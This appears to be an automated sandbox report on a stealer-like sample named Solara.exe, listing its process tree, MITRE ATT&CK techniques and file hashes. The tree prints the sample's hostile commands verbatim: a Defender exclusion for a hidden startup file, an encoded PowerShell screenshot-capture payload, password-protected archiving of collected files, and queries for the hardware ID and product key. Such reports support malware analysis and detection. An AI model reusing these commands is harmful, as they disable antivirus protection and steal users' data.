        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x7ff6b7755460,0x7ff6b7755470,0x7ff6b7755480
        7⤵
        
        PID:6044
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5228
    - - C:\ProgramData\Solara\Solara.exe
        
        "C:\ProgramData\Solara\Solara.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4176
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i1vjm3a0\i1vjm3a0.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2444
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E75.tmp" "c:\Users\Admin\AppData\Local\Temp\i1vjm3a0\CSCD5E59D2CB6124E86B28B11A0506869E0.TMP"
        6⤵
        
        PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29842\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qzuHc.zip" *"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\_MEI29842\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI29842\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qzuHc.zip" *
      4⤵
      Executes dropped EXE
      PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4468

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Solara\Solara.exe

Filesize
613KB

MD5
efa26a96b7af259f6682bc888a8b6a14

SHA1
9800a30228504c30e7d8aea873ded6a7d7d133bb

SHA256
18f4dca864799d7cd00a26ae9fb7eccf5c7cf3883c51a5d0744fd92a60ca1953

SHA512
7ca4539ab544aee162c7d74ac94b290b409944dd746286e35c8a2712db045d255b9907d1ebea6377d1406ddd87f118666121d0ec1abe0e9415de1bba6799f76e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
da8edb0f8387d38f5407c0870910646d

SHA1
2d1015f762bbc68de0d6f95d06706eda62d53f36

SHA256
7ae5611076ad876c513086fb7fc01af05fefa1e9bcfcf2ec4d0e8328cf40b25d

SHA512
5206486e14e5a9f1ec181859a8cfd20a7b102851933dde543f15acdb514f427f8dfa2d6703e654207eb4f0ade0e0ff5077ddca5ff7f22ac06a757d8fee7241da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
23fa82e121d8f73e1416906076e9a963

SHA1
b4666301311a7ccaabbad363cd1dec06f8541da4

SHA256
5fd39927e65645635ebd716dd0aef59e64aacd4b9a6c896328b5b23b6c75159e

SHA512
64920d7d818031469edff5619c00a06e5a2320bc08b3a8a6cd288c75d2a470f8c188c694046d149fa622cbb40b1f8bf572ac3d6dfc59b62a4638341ccb467dcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7b19b7ecb6ee133c2ff01f7888eae612

SHA1
a592cab7e180cc5c9ac7f4098a3c8c35b89f8253

SHA256
972bc0df18e9a9438dbc5763e29916a24b7e4f15415641230c900b6281515e78

SHA512
16301409fee3a129612cfe7bdb96b010d3da39124aa88b2d111f18d5ae5d4fc8c3c663809148dd07c7f3cd37bb78bd71e25be1584bd2d0bacf529fa7f3461fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
15746c2821fc4fba301c8b78bb3d3aa2

SHA1
04edcbe16fcd924b989afa38bac64f6173a623a2

SHA256
61a2dd1c58525abdcfa42bb9a36cfab3dfb72c720efdaab933479783624164b5

SHA512
3c42068eee6214582da85eb7ed0d865d2c19ef10d0d59397785b9da15424bd8046f475095f773a05df72ef6ec8222e9cd8d1c406879bdefe937b6b4a154f1e5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
576B

MD5
3624fa8247216ec149efeb4e493c8ca0

SHA1
4bb1c3814c995e8c87de3b63981bffa06407a5a4

SHA256
c059c79f9e6ed85f590aedcd14f5f59026f99832da8cab7d381b2155389a444f

SHA512
d22e4881dc82bc8685baadd728ed3a524be4fd4bb7864130d2032482fd143a56644fabc3f81772960fa958dc405baa0802e58bc2fe5eb31e1d9d3fbfef393842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
610bbc63e9a652ee71711c94f04ecf1e

SHA1
e051a2fe318fef2785ed5a002c21d2cf3da86bd7

SHA256
664bbe6617db61cd906cf28ff9213044bd125f2a99a6aa4a20a830bda2191d9f

SHA512
1f6b65a9c4c7de4a073e910d9a5b034178f60cfd8b78b65ce6ef3f1160147be3e48c9456154c72f7a687c2cc58476f3dc30bfbf6fb7ef39b3a1638079332bbff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e8aca061ff700f2b8775a62ab5a14a9e

SHA1
590f4f47f4d86ed84951421f426590cf0bb3a7a5

SHA256
87e9d3ccfce0852aed4f1fe71ea3dfa4a6515c138c43eb5a053514561560824d

SHA512
e39b3f1e5ee948a71a39599c2aba8c3562cae63208d04696ce8b6c541e86b86b379be5ef2db207f5f71e2a95e800b64a1101c69aa460576634df6bf886d6a1ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
8cd513127214e252edf0454f329bc002

SHA1
6f47fac6be8e7331e54203a7865e86b32cddf16b

SHA256
3df220380a8bf881117c17102a5c70ae7deea18ec92e7c478df2ee904d882108

SHA512
0b6d2f2e12bb8b15175875b7118778e57475934dee0476bc3ec989c5408d1ff5cf1c2d5dce4bd980a3ef9bfee232f974fa90050171826f3f0847f9682ae7e4c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ffbe7d9b2e7283f7ae3ed1324237ad7e

SHA1
2ee52d1d1e549524aa1abd2ecedcb9d4fbafaa4a

SHA256
a55cd3929ea7ed84e238bcc0723f8c3ba34fc3ede6085b635641e8cfca31af07

SHA512
6fa41727c1392a6480854d30aa4a86efb3e2efc44f73f051f895b67341f06d7d4be7e08fbf4df78a695d1143fa6fd57413f7d9177b486387c2ae9bf3a69e553d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
6871b14880f1d3cfccef05d599417061

SHA1
68f4685c567a2d2fb811c1d97c04ceea48169f63

SHA256
b5f9755af5ffd77dc173fbacf325867ee3d9c255b32511739a6765e34af81148

SHA512
db783a6f2400b9da6b1e644353577b484e6830be3a7195a6da29fa4558db7a62794f88665ab35dc54b6f4ca294bfc5e9586c495e4640608dd2b0764b27bf85c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
71862f32c6386c503883aa41ef8b33ad

SHA1
e8ebc8d3fe3736baa4a5d3a32e9a672869fa25c0

SHA256
